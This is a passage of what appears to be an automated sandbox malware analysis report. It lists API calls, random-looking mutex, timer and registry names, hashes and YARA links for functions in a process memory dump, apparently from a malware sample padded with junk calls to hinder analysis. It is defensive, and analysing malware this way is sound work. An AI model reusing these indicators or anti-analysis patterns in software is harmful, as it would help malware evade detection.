                                                                • OutputDebugStringA.KERNEL32(t3ewm5odv), ref: 0040E8B2
                                                                • LocalAlloc.KERNEL32(00000000,00000333), ref: 0040E8BC
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regpgrampmo,00000000,00020019,?), ref: 0040E8D8
                                                                • LocalFree.KERNEL32(00000000), ref: 0040E8DF
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXyvemg4hm), ref: 0040E8EC
                                                                • SetEnvironmentVariableA.KERNEL32(03o1p8od,99kxwiit), ref: 0040E902
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 0040E909
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040E931
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_4qsx3i2j), ref: 0040E94F
                                                                • RegOpenKeyExA.ADVAPI32(80000001,reggy7bmue0,00000000,00020019,?), ref: 0040E96C
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040E977
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_wn3dccey), ref: 0040E988
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040E992
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_elzlvdxb), ref: 0040E9A1
                                                                • SetEvent.KERNEL32(00000000), ref: 0040E9AA
                                                                • ResetEvent.KERNEL32(00000000), ref: 0040E9B1
                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00001127,00000000), ref: 0040E9C5
                                                                • OutputDebugStringA.KERNEL32(to2rpa6aq), ref: 0040E9D2
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E9D9
                                                                • OutputDebugStringA.KERNEL32(tlsbgjkes), ref: 0040E9E4
                                                                • SetEnvironmentVariableA.KERNEL32(q2zrqrlx,e3abpbr1), ref: 0040E9F4
                                                                • FindFirstFileA.KERNEL32(s_a3f8hc8a,?), ref: 0040EA06
                                                                • FindClose.KERNEL32(00000000), ref: 0040EA0D
                                                                • LocalAlloc.KERNEL32(00000000,00000A07), ref: 0040EA1A
                                                                • SetEnvironmentVariableA.KERNEL32(i4aw58sr,5sbkcc11), ref: 0040EA2C
                                                                • LocalFree.KERNEL32(00000000), ref: 0040EA33
                                                                • GetLastError.KERNEL32 ref: 0040EA39
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_oo77qao9), ref: 0040EA49
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040EA50
                                                                • OutputDebugStringA.KERNEL32(tpbqi4vp3), ref: 0040EA5B
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLuyums7pi), ref: 0040EA6A
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EA74
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXztwi3tu3), ref: 0040EA81
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040EAA6
                                                                • LocalFree.KERNEL32(00000000), ref: 0040EB4E
                                                                • LocalFree.KERNEL32(00000000), ref: 0040EB6D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$LocalTimerWaitable$DebugOutputSemaphoreString$AllocCancelFreeRelease$EnvironmentEventMutexVariable$CloseFileFindOpen$ErrorFirstHandleLastMappingReset
                                                                • String ID: 03o1p8od$5sbkcc11$99kxwiit$MTXyvemg4hm$MTXztwi3tu3$SMPHR_wn3dccey$WTMR_4qsx3i2j$WTMR_jeyw99e1$WTMR_oo77qao9$WTMR_ym6bmffb$XMLaxdt8ke2$XMLuyums7pi$e3abpbr1$ev_elzlvdxb$i4aw58sr$q2zrqrlx$reggy7bmue0$regpgrampmo$s_a3f8hc8a$t3ewm5odv$tag0xnf48$tfo0sbavo$tlsbgjkes$to2rpa6aq$tpbqi4vp3
                                                                • API String ID: 3098530101-86876278
                                                                • Opcode ID: 0b75f8140c8f329d0d9d9369423a5a571303c3f58b557c27eaa65b8fcd91852e
                                                                • Instruction ID: 7411fb536b031ab9d6539a02e1e197cb57a3909891f35cdd5ab6b52a7c060eb1
                                                                • Opcode Fuzzy Hash: 0b75f8140c8f329d0d9d9369423a5a571303c3f58b557c27eaa65b8fcd91852e
                                                                • Instruction Fuzzy Hash: 5B916032E40214AFD7209FA1DC49FDE7F78EB4C751F118426F705A75E0CAB899818BA8
                                                                Function 00407938 Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 381COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LocalFree.KERNEL32(00000000), ref: 004079CA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeLocal
                                                                • String ID: .
                                                                • API String ID: 2826327444-248832578
                                                                • Opcode ID: c1ec274a5c2534e2d88e773a90d77f53ff867cc991963b5437774b5706053e88
                                                                • Instruction ID: 0029bd0a1f781fe70f2b59c559290c74618fbb772fa13653d1a9428aef19d341
                                                                • Opcode Fuzzy Hash: c1ec274a5c2534e2d88e773a90d77f53ff867cc991963b5437774b5706053e88
                                                                • Instruction Fuzzy Hash: D8E15B71A00605EFDB14DFA4DC85AEE7BB5BF88304F108139E915B7290DB78AD41CBA9
                                                                Function 00403BE6 Relevance: 21.2, APIs: 14, Instructions: 223COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F02F
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F034
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,74DF2F20), ref: 0040F04D
                                                                  • Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,74DF2F20), ref: 0040F06C
                                                                  • Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F073
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,74DF2F20), ref: 0040F07F
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F08D
                                                                  • Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F090
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0A5
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,74DF2F20), ref: 0040F0B6
                                                                  • Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,74DF2F20), ref: 0040F0C3
                                                                  • Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0CC
                                                                  • Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0D3
                                                                  • Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,74DF2F20), ref: 0040F0E2
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,74DF2F20), ref: 0040F0FF
                                                                  • Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,74DF2F20), ref: 0040F104
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,74DF2F20), ref: 0040F114
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F139
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F140
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,74DF2F20), ref: 0040F14B
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F118
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F150
                                                                  • Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000005D6,00000000,?,00000000,?,74DF2F20), ref: 0040F165
                                                                  • Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F16C
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(tv49i65z7,?,00000000,?,74DF2F20), ref: 0040F177
                                                                  • Part of subcall function 0040F012: FindFirstFileA.KERNEL32(s_t4ckbkwe,?,?,00000000,?,74DF2F20), ref: 0040F185
                                                                  • Part of subcall function 0040F012: FindClose.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F18C
                                                                  • Part of subcall function 0040F012: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_qjkqlbwl), ref: 0040F1A1
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t9kx5wueg,?,00000000,?,74DF2F20), ref: 0040F1AA
                                                                  • Part of subcall function 0040F012: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,74DF2F20), ref: 0040F1B7
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(b4j4f6xx,jcezxitk,?,00000000,?,74DF2F20), ref: 0040F1C7
                                                                  • Part of subcall function 0040F012: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLamfolgz0), ref: 0040F1D8
                                                                  • Part of subcall function 0040F012: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,74DF2F20), ref: 0040F1E0
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t1v6z4di9,?,00000000,?,74DF2F20), ref: 0040F1E7
                                                                  • Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXdxglk35i,?,00000000,?,74DF2F20), ref: 0040F1F0
                                                                  • Part of subcall function 0040F012: ReleaseMutex.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F1FB
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,00000461,?,00000000,?,74DF2F20), ref: 0040F223
                                                                  • Part of subcall function 0040F012: GlobalFree.KERNEL32(?), ref: 0040F22C
                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00403CDE
                                                                  • Part of subcall function 0040F012: RegOpenKeyExA.ADVAPI32(80000001,regwog66qaw,00000000,00020019,?,?,00000000,?,74DF2F20), ref: 0040F217
                                                                • LocalFree.KERNEL32(00000000), ref: 00403E0B
                                                                • LocalFree.KERNEL32(?), ref: 00403E14
                                                                • LocalFree.KERNEL32(?), ref: 00403E1B
                                                                • LocalFree.KERNEL32(00000000), ref: 00403E22
                                                                • FindClose.KERNEL32(00000002), ref: 00403E49
                                                                • LocalFree.KERNEL32(00000002), ref: 00403E52
                                                                • LocalFree.KERNEL32(?), ref: 00403E62
                                                                • LocalFree.KERNEL32(00000000), ref: 00403E69
                                                                • LocalFree.KERNEL32(?), ref: 00403E70
                                                                • LocalFree.KERNEL32(00000000), ref: 00403E77
                                                                • LocalFree.KERNEL32(?), ref: 00403E80
                                                                • LocalFree.KERNEL32(?), ref: 00403E89
                                                                • LocalFree.KERNEL32(00000000), ref: 00403E90
                                                                  • Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
                                                                  • Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
                                                                  • Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
                                                                  • Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
                                                                  • Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
                                                                  • Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
                                                                  • Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
                                                                  • Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
                                                                  • Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
                                                                  • Part of subcall function 0040F788: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
                                                                  • Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Local$CreateFree$TimerWaitable$DebugOutputString$ErrorEventLastMutexReleaseSemaphore$CloseEnvironmentFileFindVariable$AllocCancel$MappingOpen$ChangeNotificationResetlstrlen$FirstGlobalHandleSize
                                                                • String ID:
                                                                • API String ID: 101571558-0
                                                                • Opcode ID: 6c1d181b8dcd0800b98b20046059eb041657a790214f2cc524e4f6451162816a
                                                                • Instruction ID: 860ca1dcaf975a5fa852e23f8dedbfa3d7c550796d3681c6397e56688bcd00f3
                                                                • Opcode Fuzzy Hash: 6c1d181b8dcd0800b98b20046059eb041657a790214f2cc524e4f6451162816a
                                                                • Instruction Fuzzy Hash: 5D716C71A00605EBDB14DFA0DC48EEE7BB9FBC9700F108179F515A7291DB789E019BA8
                                                                Function 0040392D Relevance: 21.2, APIs: 14, Instructions: 223COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F02F
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F034
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,74DF2F20), ref: 0040F04D
                                                                  • Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,74DF2F20), ref: 0040F06C
                                                                  • Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F073
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,74DF2F20), ref: 0040F07F
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F08D
                                                                  • Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F090
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0A5
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,74DF2F20), ref: 0040F0B6
                                                                  • Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,74DF2F20), ref: 0040F0C3
                                                                  • Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0CC
                                                                  • Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0D3
                                                                  • Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,74DF2F20), ref: 0040F0E2
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,74DF2F20), ref: 0040F0FF
                                                                  • Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,74DF2F20), ref: 0040F104
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,74DF2F20), ref: 0040F114
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F139
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F140
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,74DF2F20), ref: 0040F14B
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F118
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F150
                                                                  • Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000005D6,00000000,?,00000000,?,74DF2F20), ref: 0040F165
                                                                  • Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F16C
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(tv49i65z7,?,00000000,?,74DF2F20), ref: 0040F177
                                                                  • Part of subcall function 0040F012: FindFirstFileA.KERNEL32(s_t4ckbkwe,?,?,00000000,?,74DF2F20), ref: 0040F185
                                                                  • Part of subcall function 0040F012: FindClose.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F18C
                                                                  • Part of subcall function 0040F012: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_qjkqlbwl), ref: 0040F1A1
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t9kx5wueg,?,00000000,?,74DF2F20), ref: 0040F1AA
                                                                  • Part of subcall function 0040F012: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,74DF2F20), ref: 0040F1B7
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(b4j4f6xx,jcezxitk,?,00000000,?,74DF2F20), ref: 0040F1C7
                                                                  • Part of subcall function 0040F012: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLamfolgz0), ref: 0040F1D8
                                                                  • Part of subcall function 0040F012: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,74DF2F20), ref: 0040F1E0
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t1v6z4di9,?,00000000,?,74DF2F20), ref: 0040F1E7
                                                                  • Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXdxglk35i,?,00000000,?,74DF2F20), ref: 0040F1F0
                                                                  • Part of subcall function 0040F012: ReleaseMutex.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F1FB
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,00000461,?,00000000,?,74DF2F20), ref: 0040F223
                                                                  • Part of subcall function 0040F012: GlobalFree.KERNEL32(?), ref: 0040F22C
                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00403A25
                                                                  • Part of subcall function 0040F012: RegOpenKeyExA.ADVAPI32(80000001,regwog66qaw,00000000,00020019,?,?,00000000,?,74DF2F20), ref: 0040F217
                                                                • LocalFree.KERNEL32(00000000), ref: 00403B52
                                                                • LocalFree.KERNEL32(?), ref: 00403B5B
                                                                • LocalFree.KERNEL32(?), ref: 00403B62
                                                                • LocalFree.KERNEL32(00000000), ref: 00403B69
                                                                • FindClose.KERNEL32(00000002), ref: 00403B90
                                                                • LocalFree.KERNEL32(00000002), ref: 00403B99
                                                                • LocalFree.KERNEL32(?), ref: 00403BA9
                                                                • LocalFree.KERNEL32(00000000), ref: 00403BB0
                                                                • LocalFree.KERNEL32(?), ref: 00403BB7
                                                                • LocalFree.KERNEL32(00000000), ref: 00403BBE
                                                                • LocalFree.KERNEL32(?), ref: 00403BC7
                                                                • LocalFree.KERNEL32(?), ref: 00403BD0
                                                                • LocalFree.KERNEL32(00000000), ref: 00403BD7
                                                                  • Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
                                                                  • Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
                                                                  • Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
                                                                  • Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
                                                                  • Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
                                                                  • Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
                                                                  • Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
                                                                  • Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
                                                                  • Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
                                                                  • Part of subcall function 0040F788: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
                                                                  • Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Local$CreateFree$TimerWaitable$DebugOutputString$ErrorEventLastMutexReleaseSemaphore$CloseEnvironmentFileFindVariable$AllocCancel$MappingOpen$ChangeNotificationResetlstrlen$FirstGlobalHandleSize
                                                                • String ID:
                                                                • API String ID: 101571558-0
                                                                • Opcode ID: e3321f44b5661d564ea2c1f83f558f1129ccb2678f8e07cf01dbb962329b09cd
                                                                • Instruction ID: 91d082d5e3e4d1df036fdba9a6df0387cb50e19caeaddd8ab95f8299dce3539a
                                                                • Opcode Fuzzy Hash: e3321f44b5661d564ea2c1f83f558f1129ccb2678f8e07cf01dbb962329b09cd
                                                                • Instruction Fuzzy Hash: DC718B71A00605EBDB14DFA0DC48EEE7BB9FBC9304F108179F511A7291DB789E009B68
                                                                Function 004084FB Relevance: 21.2, APIs: 14, Instructions: 219COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F02F
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F034
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,74DF2F20), ref: 0040F04D
                                                                  • Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,74DF2F20), ref: 0040F06C
                                                                  • Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F073
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,74DF2F20), ref: 0040F07F
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F08D
                                                                  • Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F090
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0A5
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,74DF2F20), ref: 0040F0B6
                                                                  • Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,74DF2F20), ref: 0040F0C3
                                                                  • Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0CC
                                                                  • Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0D3
                                                                  • Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,74DF2F20), ref: 0040F0E2
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,74DF2F20), ref: 0040F0FF
                                                                  • Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,74DF2F20), ref: 0040F104
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,74DF2F20), ref: 0040F114
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F139
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F140
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,74DF2F20), ref: 0040F14B
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F118
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F150
